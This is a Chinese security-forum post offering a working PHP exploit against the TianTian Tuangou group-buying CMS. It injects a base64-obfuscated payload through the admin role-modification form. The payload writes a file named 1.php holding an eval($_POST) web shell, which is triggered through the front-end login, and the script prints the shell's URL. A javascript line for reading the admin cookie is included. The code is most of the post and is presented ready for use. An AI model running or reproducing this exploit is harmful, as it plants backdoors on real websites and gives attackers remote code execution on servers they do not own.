by k4shifz[w.s.t]
bbs.wolvez.org
上次说到天天团购的后台拿shell。
后台注射,向数据库插入代码。exp需要填写四个参数 $host、$path、$formhash、$cookie。提交后,前台登录执行代码。
<?php
/*
TianTian Tuangou getshell codz by k4shifz
Team: bbs.worlvez.org
*/
$host='localhost';
$path='tttuangou';
/*
view : /admin.php?mod=role_action&code=modify&id=50
get cookie : javascript:document.write(document.cookie);
*/
$formhash='596da77e66139589';
$cookie='admin cookies';
/* injection */
$data=rawurlencode('eval(base64_decode("ZnB1dHMoZm9wZW4oJzEucGhwJywndysnKSwnPD9waHAgQGV2YWwoJF9QT1NUW2tdKTs/PicpOw=="));');
$cmd='FORMHASH='.$formhash.'&id=50&is_admin=0&php_code='.$data.'&name=%B5%C7%C2%BD%CF%B5%CD%B3&allow_all=1&role_ids%5B%5D=1&role_ids%5B%5D=3&role_ids%5B%5D=4&role_ids%5B%5D=5&role_ids%5B%5D=6&role_ids%5B%5D=2&role_ids%5B%5D=7&module=login&action=dologin%7C&log=0&message=&describe=&update_value%5Bcredits%5D=0&require_value%5Bcredits%5D=0&detailsubmit=%CC%E1+%BD%BB';
$fs=fsockopen($host,'80');
fputs($fs,'POST /'.$path.'/admin.php?mod=role_action&code=domodify HTTP/1.0
Referer:http://'.$host.'/'.$path.'/admin.php?mod=role_action&code=modify&id=50
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: '.$host.'
Content-Length: '.strlen($cmd).'
Cookie: '.$cookie.'
'.$cmd);
fclose($fs);
file_get_contents("http://{$host}/{$path}/index.php?mod=login");
exit("ok\nhttp://{$host}/{$path}/1.php k\n");
?>
前台的问题还是挺多的,黑盒估计都能测出来。
推荐
评论(0条)
